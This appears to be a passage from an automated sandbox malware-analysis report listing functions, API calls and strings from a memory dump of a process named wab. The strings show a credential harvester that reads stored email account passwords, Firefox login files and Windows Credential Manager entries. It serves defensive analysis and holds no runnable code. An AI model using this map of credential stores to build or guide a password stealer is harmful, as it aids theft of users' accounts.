                                                              • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                              Function 0040244A Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 004024F5
                                                                • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                              • _mbscpy.MSVCRT ref: 00402533
                                                              • _mbscpy.MSVCRT ref: 004025FD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy$QueryValuememset
                                                              • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                              • API String ID: 168965057-606283353
                                                              • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                              • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                              • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                              • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                              Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                              • LoadCursorA.USER32(00000067), ref: 0040115F
                                                              • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                              • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                              • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                              • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                              • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                              • EndDialog.USER32(?,00000001), ref: 0040121A
                                                              • DeleteObject.GDI32(?), ref: 00401226
                                                              • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                              • ShowWindow.USER32(00000000), ref: 00401253
                                                              • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                              • ShowWindow.USER32(00000000), ref: 00401262
                                                              • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                              • memset.MSVCRT ref: 0040128E
                                                              • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                              • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                              • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                              • String ID:
                                                              • API String ID: 2998058495-0
                                                              • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                              • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                              • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                              • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                              Function 0044257F Relevance: 33.4, APIs: 7, Strings: 15, Instructions: 375COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcmp$memcpy
                                                              • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                              • API String ID: 231171946-2189169393
                                                              • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                              • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                              • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                              • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                              Function 0041108D Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _mbscat$memsetsprintf$_mbscpy
                                                              • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                              • API String ID: 633282248-1996832678
                                                              • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                              • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                              • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                              • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                              Function 004111AA Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: sprintf$memset$_mbscpy
                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                              • API String ID: 3402215030-3842416460
                                                              • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                              • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                              • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                              • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                              Function 0040F0CE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 192stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                • Part of subcall function 004080D4: ??3@YAXPAX@Z.MSVCRT ref: 004080DB
                                                                • Part of subcall function 00407035: _mbscpy.MSVCRT ref: 0040703A
                                                                • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DBD8
                                                                • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DC38
                                                                • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                              • strlen.MSVCRT ref: 0040F139
                                                              • strlen.MSVCRT ref: 0040F147
                                                              • memset.MSVCRT ref: 0040F187
                                                              • strlen.MSVCRT ref: 0040F196
                                                              • strlen.MSVCRT ref: 0040F1A4
                                                              • memset.MSVCRT ref: 0040F1EA
                                                              • strlen.MSVCRT ref: 0040F1F9
                                                              • strlen.MSVCRT ref: 0040F207
                                                              • _strcmpi.MSVCRT ref: 0040F2B2
                                                              • _mbscpy.MSVCRT ref: 0040F2CD
                                                              • _mbscpy.MSVCRT ref: 0040F30E
                                                                • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                                                • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_mbsicmp_strcmpistrrchr
                                                              • String ID: logins.json$none$signons.sqlite$signons.txt
                                                              • API String ID: 1613542760-3138536805
                                                              • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                              • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                              • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                              • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                              Function 0040C3D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 111stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                              • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                              • API String ID: 1012775001-1343505058
                                                              • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                              • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                              • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                              • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                              Function 004445ED Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00444612
                                                                • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                              • strlen.MSVCRT ref: 0044462E
                                                              • memset.MSVCRT ref: 00444668
                                                              • memset.MSVCRT ref: 0044467C
                                                              • memset.MSVCRT ref: 00444690
                                                              • memset.MSVCRT ref: 004446B6
                                                                • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                              • memcpy.MSVCRT ref: 004446ED
                                                                • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                                                                • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                              • memcpy.MSVCRT ref: 00444729
                                                              • memcpy.MSVCRT ref: 0044473B
                                                              • _mbscpy.MSVCRT ref: 00444812
                                                              • memcpy.MSVCRT ref: 00444843
                                                              • memcpy.MSVCRT ref: 00444855
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset$strlen$_mbscpy
                                                              • String ID: salu
                                                              • API String ID: 3691931180-4177317985
                                                              • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                              • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                              • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                              • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                              Function 00410034 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                              • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Library$FreeLoad
                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                              • API String ID: 2449869053-232097475
                                                              • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                              • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                              • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                              • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                              Function 0040955A Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • sprintf.MSVCRT ref: 0040957B
                                                              • LoadMenuA.USER32(?,?), ref: 00409589
                                                                • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                              • DestroyMenu.USER32(00000000), ref: 004095A7
                                                              • sprintf.MSVCRT ref: 004095EB
                                                              • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                              • memset.MSVCRT ref: 0040961C
                                                              • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                              • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                              • DestroyWindow.USER32(00000000), ref: 0040965C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                              • String ID: caption$dialog_%d$menu_%d
                                                              • API String ID: 3259144588-3822380221
                                                              • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                              • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                              • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                              • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                              Function 004045DB Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                              • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                              • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                              • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                              • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                              • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Library$FreeLoad
                                                              • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                              • API String ID: 2449869053-4258758744
                                                              • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                              • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                              • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                              • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                              Function 00404235 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • wcsstr.MSVCRT ref: 0040426A
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                              • _mbscpy.MSVCRT ref: 004042D5
                                                              • _mbscpy.MSVCRT ref: 004042E8
                                                              • strchr.MSVCRT ref: 004042F6
                                                              • strlen.MSVCRT ref: 0040430A
                                                              • sprintf.MSVCRT ref: 0040432B
                                                              • strchr.MSVCRT ref: 0040433C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                              • String ID: %s@gmail.com$www.google.com
                                                              • API String ID: 3866421160-4070641962
                                                              • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                              • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                              • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                              • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                              Function 0040E381 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                              • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                              • API String ID: 2360744853-2229823034
                                                              • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                              • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                              • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                              • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                              Function 004100CC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • strchr.MSVCRT ref: 004100E4
                                                              • _mbscpy.MSVCRT ref: 004100F2
                                                                • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                              • _mbscpy.MSVCRT ref: 00410142
                                                              • _mbscat.MSVCRT ref: 0041014D
                                                              • memset.MSVCRT ref: 00410129
                                                                • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                • Part of subcall function 0040715B: _mbscpy.MSVCRT ref: 00407180
                                                              • memset.MSVCRT ref: 00410171
                                                              • memcpy.MSVCRT ref: 0041018C
                                                              • _mbscat.MSVCRT ref: 00410197
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                              • String ID: \systemroot
                                                              • API String ID: 912701516-1821301763
                                                              • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                              • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                              • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                              • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                              Function 004196A1 Relevance: 15.3, APIs: 6, Strings: 4, Instructions: 321COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy$strlen
                                                              • String ID: -journal$-wal$immutable$nolock
                                                              • API String ID: 2619041689-3408036318
                                                              • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                              • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                              • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                              • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                              Function 004086E0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 155COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                              • wcslen.MSVCRT ref: 0040874A
                                                              • _wcsncoll.MSVCRT ref: 00408794
                                                              • memset.MSVCRT ref: 0040882A
                                                              • memcpy.MSVCRT ref: 00408849
                                                              • wcschr.MSVCRT ref: 0040889F
                                                              • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$FreeLibraryLoadLocal_wcsncollmemcpymemsetwcschrwcslen
                                                              • String ID: J$Microsoft_WinInet
                                                              • API String ID: 2203907242-260894208
                                                              • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                              • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                              • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                              • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                              Function 0040966C Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                              • _mbscpy.MSVCRT ref: 00409686
                                                              • _mbscpy.MSVCRT ref: 00409696
                                                              • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                              • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                              • API String ID: 888011440-2039793938
                                                              • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                              • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                              • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                              • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                              Function 00403166 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                              • strchr.MSVCRT ref: 0040327B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringstrchr
